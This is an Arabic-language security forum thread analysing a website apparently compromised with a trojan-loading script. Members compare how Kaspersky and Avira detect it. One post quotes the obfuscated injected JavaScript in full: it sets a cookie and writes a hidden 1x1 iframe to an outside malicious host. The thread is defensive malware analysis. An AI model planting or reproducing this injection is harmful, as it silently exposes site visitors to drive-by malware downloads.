• [ يمنع ] طرح أي موضوع يحوي على كراكات أو باتشات او كيجنات من غير فحصها عبر موقع فيروس توتال [ virustotal.com ] وطرح رابط الفحص ضِمن الموضوع.

موقع يظم بين أنحائه تروجان

  • بادئ الموضوع بادئ الموضوع البتال
  • تاريخ البدء تاريخ البدء
  • المشاهدات 3,185
الحالة
مغلق و غير مفتوح للمزيد من الردود.
i13010_1.png
 

توقيع : البتال
يعطيكم العافية السكربت موجود لدي تم الحصول على السكربت الذي كشفه الكاسبر ^^
سوف اقوم بتحليله لماذ يقوم بكشفه ومن يرد مساعدتي او لديه اي خبرة يطلب على الخاص *^^
 
jolt_k!ng قال:
يعطيكم العافية السكربت موجود لدي تم الحصول على السكربت الذي كشفه الكاسبر ^^
سوف اقوم بتحليله لماذ يقوم بكشفه ومن يرد مساعدتي او لديه اي خبرة يطلب على الخاص *^^
أنقر للتوسيع...

أخي الكريم السكربت موجود وضعه أخي الفاضل عزام وأنا وضعته أيضاً يالتوفيق ننتظر تحليلك
أخوكم
 
توقيع : البتال
تمام عليك
اظن التحليل سبق وان عمل به اخونا ibis
من هنا
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
 
توقيع : Juve GuardJuve Guard is verified member.
توقيع : البتال
انا دخلت على الموقع وبينقلني لصفحه ثانيه طلع عندي كذا

i13011_2346.jpg


ثم بعدين ادخله عادي ماينقلني
 
^
^^
احذف الملفات المؤقته بالمتصفح
وارجع ادخل الموقع من جديد
وراح تشوف الصفحه راجعه مره ثانيه
 
توقيع : Juve GuardJuve Guard is verified member.
Juve Guard قال:
تمام عليك
اظن التحليل سبق وان عمل به اخونا ibis
من هنا
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
أنقر للتوسيع...
والله اخوك مبتدأ بالتحليل ننتظر استاذنا Ibis حتى ناخذ الخبر اليقين
وتم ارسال السكربت بدون طلب <<<<< :hh: مثل ما عمل معه وليد ما في مفر
 
jolt_k!ng قال:
والله اخوك مبتدأ بالتحليل ننتظر استاذنا ibis حتى ناخذ الخبر اليقين
وتم ارسال السكربت بدون طلب <<<<< :hh: مثل ما عمل معه وليد ما في مفر
أنقر للتوسيع...

جزاك الله خيراً أخي الكريم وبالتوفيق نتمنى أن ياتي الرد بسرعة بالإنتظار
بارك الله فيك
أخوكم
 
توقيع : البتال
اخواني الموقع فعلا فيه كود ضار .. اليكم الكود

var today=new Date(),expires=new Date(today.getTime()+2678400000);if(document.cookie.indexOf("_ubit=1")==-1){document.write("<ifram"+"e widt"+"h=1 h"+"eight="+"1 src="+"'http:"+"//load"+"ing-nr"+"p.net/"+"b2b/' "+"style="+"'displ"+"ay:non"+"e'></i"+"frame>");document.cookie="_ubit=1;"+" expires="+expires.toGMTString()+"; "}


لو تلاحظوا انوا السكربت فيه اتصال لموقع تاني وهو ضار جدا اللي هوه loading-nrp.net/b2b والموقع ده بيحولك لموقع تاني اللي هوه ده
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
و ده بقي عش الفيروسااااااات ولو انتا دخلت علي الرابط ده
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
هينزل معاك ملف بس مش هيشتغل لانه مساحته 0 يمكن الهاكر لسه بيجهز لفيروس جديد :q: واكيد في ملفات تانيه بس انا مش عارفه اسمها. والله تعالي اعلي و اعلم
 
MATR!X قال:
اخواني الموقع فعلا فيه كود ضار .. اليكم الكود

var today=new Date(),expires=new Date(today.getTime()+2678400000);if(document.cookie.indexOf("_ubit=1")==-1){document.write("<ifram"+"e widt"+"h=1 h"+"eight="+"1 src="+"'http:"+"//load"+"ing-nr"+"p.net/"+"b2b/' "+"style="+"'displ"+"ay:non"+"e'></i"+"frame>");document.cookie="_ubit=1;"+" expires="+expires.toGMTString()+"; "}


لو تلاحظوا انوا السكربت فيه اتصال لموقع تاني وهو ضار جدا اللي هوه loading-nrp.net/b2b والموقع ده بيحولك لموقع تاني اللي هوه ده
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
و ده بقي عش الفيروسااااااات ولو انتا دخلت علي الرابط ده
يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي
هينزل معاك ملف بس مش هيشتغل لانه مساحته 0 يمكن الهاكر لسه بيجهز لفيروس جديد :q: واكيد في ملفات تانيه بس انا مش عارفه اسمها. والله تعالي اعلي و اعلم
أنقر للتوسيع...
جميل
يعني صار الاكتشاف للجميع سواءا الكاسبر او الأفيرا صحيح
بس الفرق بين هذا وهذا
ان الكاسبر حجب السكربت نفسه
لكن الأفيرا فضح عملية السكربت وحولك للموقع المتصل وحجبه
والحمد لله ارسلت السكربت للمختبر وهذا ردهم :
The file 'vbulletin_global.js' has been determined to be 'MALWARE'. Our analysts named the threat HTML/Agent.kfa. The term "HTML/" denotes a script-virus that is able to infect the system using a HTML script.Detection will be added to our virus definition file (VDF) with one of the next updates.
أنقر للتوسيع...
وفي النهايه تبين ان حمايه الويب الخاصه بالكاسبر افضل من الأفيرا
لأن الكاسبر يحجب النقطه الخطره بالمنتدى ولا يحجب المنتدى بأكمله
بينما الأفيرا حجب المنتدى من اوله الى اخره على شان نقطة خطر وحده :q:
والعمليه هذي شبيهه بقوه التنظيف في الكاسبر بدون الحذف
وفي الافيرا حذف جميع الملفات اذا تواجد بينهم ملف واحد ضار :q:
فديت هـ المكافحين بس :wink:
 
توقيع : Juve GuardJuve Guard is verified member.
يا جماعة اعدادات الافيرا عندي متل اعدادات الاخ عزام ومع ذلك لم يحجب الموقع فما هو السبب؟؟
 
توقيع : مجيد الحلو
مجيد الحلو قال:
يا جماعة اعدادات الافيرا عندي متل اعدادات الاخ عزام ومع ذلك لم يحجب الموقع فما هو السبب؟؟
أنقر للتوسيع...
حدث الأفيرا
وجرب ادخل على الموقع
وتأكد ان الاصدار الي عندك هو 9
 
توقيع : Juve GuardJuve Guard is verified member.
Juve Guard قال:
حدث الأفيرا
وجرب ادخل على الموقع
وتأكد ان الاصدار الي عندك هو 9
أنقر للتوسيع...

i13073_20090521163828.png


وبالنسبة للتحديث فالبرنامج محدث من قليل​
 
توقيع : مجيد الحلو
توقيع : Juve GuardJuve Guard is verified member.
متااااااااابع ,,

والنورتون لم يكتشف اي رابط في الموضوع من البداية إلى النهاية ,,
 
توقيع : FABs
توقيع : مجيد الحلو
وعليكم السلام ورحمة الله وبركاته

ارسل بارك الله فيك
 
توقيع : al7non
دخلت الموقع عن طريق برنامج التحليل, قفلوا الباب فى وجهى :mad:

520200980216pm.png

 
توقيع : ibis
الحالة
مغلق و غير مفتوح للمزيد من الردود.
عودة
أعلى